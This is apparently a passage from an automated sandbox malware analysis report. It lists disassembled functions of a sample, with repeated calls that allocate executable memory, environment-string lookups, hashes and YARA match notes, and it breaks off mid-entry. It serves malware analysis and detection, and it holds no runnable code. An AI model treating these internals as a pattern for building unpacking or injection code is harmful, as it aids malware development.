                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 9f223972c6e00767f31f53eb7143541c46e9f4b68b12634d2ed7506813b22cfe
                                              • Instruction ID: 95e9ae32ece9e6ca1bf652ccd6d0cd215aa4d57dc14d79640cb1958a1bbfb7ef
                                              • Opcode Fuzzy Hash: 9f223972c6e00767f31f53eb7143541c46e9f4b68b12634d2ed7506813b22cfe
                                              • Instruction Fuzzy Hash: BFD1F0B25083558FE710CF18C881B6BBBE2EF95714F14892CF6998B391E775D809CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00717C47 Relevance: 6.3, APIs: 4, Instructions: 290nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 00717CEF
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 00717D4C
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,900000C2,00000000,?,00003000,00000040), ref: 00717E0D
                                              • NtFreeVirtualMemory.NTDLL(000000FF,900000C2,00000010,00008000), ref: 00717E66
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 173c32154affdbdc667f6446fb9e2f64271c96d6fde4b8c3c79ed66e94f019e3
                                              • Instruction ID: 2630086d7b1a202b93c037fa051200fc4a7fcfedef2730c7ddcf8e36c2512d30
                                              • Opcode Fuzzy Hash: 173c32154affdbdc667f6446fb9e2f64271c96d6fde4b8c3c79ed66e94f019e3
                                              • Instruction Fuzzy Hash: 31B157752083059FD714CF18C880A6AB7F5EF88754F148A2CF9948B3A0D778E946CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004379E0 Relevance: 6.3, APIs: 4, Instructions: 290nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 00437A88
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 00437AE5
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,900000C2,00000000,?,00003000,00000040), ref: 00437BA6
                                              • NtFreeVirtualMemory.NTDLL(000000FF,900000C2,00000010,00008000), ref: 00437BFF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: fd219758d9db17cc94796abe45fd0d6473a22074745e6749ab2f388bb29d676e
                                              • Instruction ID: cd35143630c2b7208a231692c9bfede39d70e314533d5fdb885180932d4d8fe2
                                              • Opcode Fuzzy Hash: fd219758d9db17cc94796abe45fd0d6473a22074745e6749ab2f388bb29d676e
                                              • Instruction Fuzzy Hash: A3B159B52083059FD720CF18C880B2BB7E5FF89754F148A2DE9959B3A0D778E905CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00712527 Relevance: 6.3, APIs: 4, Instructions: 267nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 007125E3
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 00712636
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,0000BA00,00003000,00000040), ref: 00712787
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000010,00008000), ref: 007127DA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: bb9a09759b8c52a7af2f9d5a8e3ea93175dc5b911b8a386b5509ad4328e8e534
                                              • Instruction ID: 31cf8e52aa66d02072bedcd2a889bb5e8fabaf054375873a638d66ff706647f3
                                              • Opcode Fuzzy Hash: bb9a09759b8c52a7af2f9d5a8e3ea93175dc5b911b8a386b5509ad4328e8e534
                                              • Instruction Fuzzy Hash: 929169752083409FE710CF18C844B5BBBE5FB89718F148A1CF9A89B2D1D774D84ACB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00717927 Relevance: 6.2, APIs: 4, Instructions: 250nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 007179CC
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 00717A2A
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,D2FF0000,00000000,?,00003000,00000040), ref: 00717AF1
                                              • NtFreeVirtualMemory.NTDLL(000000FF,000000B8,00000000,00008000), ref: 00717B4E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 4a0168ff795fabbc8994d38d6af19aed225ae0147579180104e460b07bb7a6ad
                                              • Instruction ID: 9656bec376d5d52a8b8c16b63fd42cee653e977c460326634b1163a357e3bde7
                                              • Opcode Fuzzy Hash: 4a0168ff795fabbc8994d38d6af19aed225ae0147579180104e460b07bb7a6ad
                                              • Instruction Fuzzy Hash: B381AB712083059FD714CF18C880B5FB7F5EF88364F148A2CF9989B2A0E7789949CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00712867 Relevance: 6.2, APIs: 4, Instructions: 206nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 00712910
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 0071295E
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,0000BA00,00003000,00000040), ref: 00712A96
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000010,00008000), ref: 00712AE4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 3183d0fc1c45eb8ffbe76e0d2bf465086227915d5149b185099a8ad591cb09a2
                                              • Instruction ID: b1eb8f2431252905aa8dbb2dab682754c44aa75ecbbe9233ac93e724599cd9c3
                                              • Opcode Fuzzy Hash: 3183d0fc1c45eb8ffbe76e0d2bf465086227915d5149b185099a8ad591cb09a2
                                              • Instruction Fuzzy Hash: DB8168B52083409FE310CF18C854B5BBBE5FB85724F248A2CE9A89B3D1D775D849CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00432600 Relevance: 6.2, APIs: 4, Instructions: 206nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 004326A9
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 004326F7
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,0000BA00,00003000,00000040), ref: 0043282F
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000010,00008000), ref: 0043287D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: b97c9c9b145aad2e1d9368271895e216e87d9cc9384d0ae90c19c4d28519d217
                                              • Instruction ID: b7602bd55606e6d13354845806596aa518dbb84f2c3c29a10939dc9f0e37411e
                                              • Opcode Fuzzy Hash: b97c9c9b145aad2e1d9368271895e216e87d9cc9384d0ae90c19c4d28519d217
                                              • Instruction Fuzzy Hash: 558178756083009FE304DF18C944B1BBBE5FB89728F144A2DE5A49B3D1D7B5D809CB9A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006F832C Relevance: 6.1, APIs: 4, Instructions: 138nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 006F84B6
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 006F84FD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 8f1e51718da0f83a02f2f44deb78f8a3df6a609a11e9e7c5692b80009bb081c0
                                              • Instruction ID: 6a6c65f2b1f035d31273ce257e4e1026b05e6aa1af8ce5676d83dd588ebe1fc3
                                              • Opcode Fuzzy Hash: 8f1e51718da0f83a02f2f44deb78f8a3df6a609a11e9e7c5692b80009bb081c0
                                              • Instruction Fuzzy Hash: 7F5167B51087059FE704CF14C844B6EB7E4FB89308F144A2CF6A99B3A0DB74D909CB9A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004180C5 Relevance: 6.1, APIs: 4, Instructions: 138nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 0041824F
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 00418296
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 8f1e51718da0f83a02f2f44deb78f8a3df6a609a11e9e7c5692b80009bb081c0
                                              • Instruction ID: ea426b73a6193aca508bd4f71ddd3128639f88ab0726b32ca3609f59bda8a89b
                                              • Opcode Fuzzy Hash: 8f1e51718da0f83a02f2f44deb78f8a3df6a609a11e9e7c5692b80009bb081c0
                                              • Instruction Fuzzy Hash: 155155B51087059FE704CF04C844B5FB7E4FB89708F144A2DF9A99B2A0DB78D9498B9A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006F6EF4 Relevance: 6.1, APIs: 4, Instructions: 114nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,000000B8,00003000,00000040), ref: 006F6F46
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 006F6F90
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,000000B8,00003000,00000040), ref: 006F7036
                                              • NtFreeVirtualMemory.NTDLL(000000FF,5C3924FC,?,00008000), ref: 006F7080
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 7f5145cdc1ba7bdbf325bf54874c91c1703ebb6d8d5572ff1395ec8793542ebc
                                              • Instruction ID: 23e9831821634805336530c121043c9c276f2f994191521cca9c1300ce82275f
                                              • Opcode Fuzzy Hash: 7f5145cdc1ba7bdbf325bf54874c91c1703ebb6d8d5572ff1395ec8793542ebc
                                              • Instruction Fuzzy Hash: 784149B51087049FE710CF14C844B6EB7E9FB88318F544A2CF6A99B3A0D774D908CB9A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006E4D17 Relevance: 5.5, Strings: 4, Instructions: 506COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: )$IDAT$IEND$IHDR
                                              • API String ID: 0-3181356877
                                              • Opcode ID: f4058fd5fcca487bb8e99b228029b2f7b0a1782982b118de500cbaa2cf4054f1
                                              • Instruction ID: 7986abfe6b5466d61ac6eb7023fde17ff5157d85e9bdc16f34276318d7a03306
                                              • Opcode Fuzzy Hash: f4058fd5fcca487bb8e99b228029b2f7b0a1782982b118de500cbaa2cf4054f1
                                              • Instruction Fuzzy Hash: 1F1213716093848FD718CF29C8907AA7BE2FF85304F15466CEA868B3D1D776D909CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006FB497 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 209COMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 006FB5AD
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 006FB5DB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: EnvironmentExpandStrings
                                              • String ID: `a
                                              • API String ID: 237503144-512829590
                                              • Opcode ID: 2ba9c0707b692f4f07f3c48157f3a9eecaa5ad8444f655b7713eb7156d60c94c
                                              • Instruction ID: 403342e141f241663b22d3fa938e3c35de237d444b3622a0f40aea2f0d7b4cfc
                                              • Opcode Fuzzy Hash: 2ba9c0707b692f4f07f3c48157f3a9eecaa5ad8444f655b7713eb7156d60c94c
                                              • Instruction Fuzzy Hash: 5971CF706083818BE728CF14C8A1BABB7E2FFC5304F048A1CE9955B381D7B49945CB97
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041B230 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 209COMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0041B346
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0041B374
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: EnvironmentExpandStrings
                                              • String ID: `a
                                              • API String ID: 237503144-512829590
                                              • Opcode ID: f86cb4591fc71e74da725966c1eb0e60b94ca4f5965b5f3c60f3e3b5fd6e9612
                                              • Instruction ID: 211465a6f8bb4c712efb5c1327cce063fb9030e645e76492337cb801d03caa5d
                                              • Opcode Fuzzy Hash: f86cb4591fc71e74da725966c1eb0e60b94ca4f5965b5f3c60f3e3b5fd6e9612
                                              • Instruction Fuzzy Hash: 12719D716083518BE728CF15C8A1B9BB7E2EFC9308F048A1DE8995B381D7B49545CBD7
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00717257 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 007173AC
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 00717409
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: @
                                              • API String ID: 292159236-2766056989
                                              • Opcode ID: 6996d07a353da892851f4c2cbdd3a313a6ee4d4a3484e03e6a3ef98ba35a13ce
                                              • Instruction ID: d4b4805395ae8d8ff768296fabd9fdb4a2ad0a654a73cc451117b1e10248ea7b
                                              • Opcode Fuzzy Hash: 6996d07a353da892851f4c2cbdd3a313a6ee4d4a3484e03e6a3ef98ba35a13ce
                                              • Instruction Fuzzy Hash: CF418AB20087009FD714CF18C844B5AB7F4FF85368F148A1DF9A89B2E0E3789948CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006FB916 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 006FBA93
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 006FBAEB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: NM
                                              • API String ID: 292159236-659443033
                                              • Opcode ID: f17b37614a2649c84a47a7bd143c36d68b9802bcd3225b799024dfba8cbae39f
                                              • Instruction ID: 6606ebf5532e3b2811070104c4084099871a134da152e22303f61dcf4ec90430
                                              • Opcode Fuzzy Hash: f17b37614a2649c84a47a7bd143c36d68b9802bcd3225b799024dfba8cbae39f
                                              • Instruction Fuzzy Hash: 6E5101B41083809FD720CF04C894B9FBBE5BB85708F144A2DE5E59B391D7B49909CF9A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041B6AF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 0041B82C
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 0041B884
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: NM
                                              • API String ID: 292159236-659443033
                                              • Opcode ID: e61b303816415c7f5f5d92e4ab71877ace8d6bab5c9632d1ce1da36c78d05f1f
                                              • Instruction ID: f00f4fd28a0e5576ffbbb8e6303699de98ce98a9013cd7b91c2115223f1c65f0
                                              • Opcode Fuzzy Hash: e61b303816415c7f5f5d92e4ab71877ace8d6bab5c9632d1ce1da36c78d05f1f
                                              • Instruction Fuzzy Hash: 4F5120B01083809FD320CF04C894B9BBBE5FB85748F104A2DE5E59B391D7B89949CF9A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 007177B7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 007178BC
                                              • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 0071790E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: @
                                              • API String ID: 292159236-2766056989
                                              • Opcode ID: 2f6ba8cee97a2f9810962fc78690305e3b4e58b623afafa70e25634a7e200208
                                              • Instruction ID: 424f7dd7e4b8ae21ccb66344d07ffdcc45de7ddd5f734b77d304416a936b5770
                                              • Opcode Fuzzy Hash: 2f6ba8cee97a2f9810962fc78690305e3b4e58b623afafa70e25634a7e200208
                                              • Instruction Fuzzy Hash: 3B412AB55083109FD710CF18C844B5BBBE4FB89368F008A2CF9A9A7390D374D948CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00717557 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 0071760B
                                              • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 0071766A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: $
                                              • API String ID: 292159236-3993045852
                                              • Opcode ID: c37c6b5c451b38d6ae7fb4e42b3a4e5df3548462c2cec44560233b9523c4bb9e
                                              • Instruction ID: cb9549253748075528482061d222b18d17335014334564f61b93a7b29d20fa59
                                              • Opcode Fuzzy Hash: c37c6b5c451b38d6ae7fb4e42b3a4e5df3548462c2cec44560233b9523c4bb9e
                                              • Instruction Fuzzy Hash: 0A315075208314AFD714CF18CC44B5BB7E8EB89758F104A2CFAA89B2D0E7759948CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00717687 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 0071773B
                                              • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 0071779A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: $
                                              • API String ID: 292159236-3993045852
                                              • Opcode ID: bdb6a8228723a2d665ed6d9d506fb2c16468f78bb87a046c87a3f8281fd40b64
                                              • Instruction ID: 588171135dccca9fee94043ac498771b7cc74f888117f70621e48832732106b0
                                              • Opcode Fuzzy Hash: bdb6a8228723a2d665ed6d9d506fb2c16468f78bb87a046c87a3f8281fd40b64
                                              • Instruction Fuzzy Hash: 90316D75208704AFE714CF18CC84B5AB7E8EB85758F104A2CFAA49B2D0D7B59D48CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00437420 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 004374D4
                                              • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 00437533
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: $
                                              • API String ID: 292159236-3993045852
                                              • Opcode ID: bdb6a8228723a2d665ed6d9d506fb2c16468f78bb87a046c87a3f8281fd40b64
                                              • Instruction ID: 412d602cbfcbcf5e118d5b7ea9dfba44e96f25c8408074ac52780fe9017936c2
                                              • Opcode Fuzzy Hash: bdb6a8228723a2d665ed6d9d506fb2c16468f78bb87a046c87a3f8281fd40b64
                                              • Instruction Fuzzy Hash: 9A313275208315AFE710CF14DC84B1BBBE8EB89754F10492DFAA4973D0D775A9088B97
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006F9E67 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 006F9F08
                                              • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 006F9F6F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: ,
                                              • API String ID: 292159236-3772416878
                                              • Opcode ID: 0611d15885a3dbbd9c50aa940e03470727d33db14537f0f80ce13edc545bdf30
                                              • Instruction ID: 94df48ca65ea96c96877ff4d151c78df900b284f20f1658aae01415a401decdc
                                              • Opcode Fuzzy Hash: 0611d15885a3dbbd9c50aa940e03470727d33db14537f0f80ce13edc545bdf30
                                              • Instruction Fuzzy Hash: 9E312B75108314AFD710CF15CC44B6BBBE5FB89754F148A2CFAA99B390D77198088B97
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006F8627 Relevance: 5.3, Strings: 4, Instructions: 326COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: IQPS$Y=Y?$qw$uk
                                              • API String ID: 0-3965859587
                                              • Opcode ID: f7be5749a5b58e2cc3b508d5bf0a65a67ce16adbd5ef003d977847e3760ef88f
                                              • Instruction ID: 6938d5b8d17a152dfff45fba4c889b86ab6e91c84868222a209575a63c533b21
                                              • Opcode Fuzzy Hash: f7be5749a5b58e2cc3b508d5bf0a65a67ce16adbd5ef003d977847e3760ef88f
                                              • Instruction Fuzzy Hash: CCD149B0500B458FD324CF25C491B22FBB1BF46304F148A9CD8A68BB96D335E999CBD5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004183C0 Relevance: 5.3, Strings: 4, Instructions: 326COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
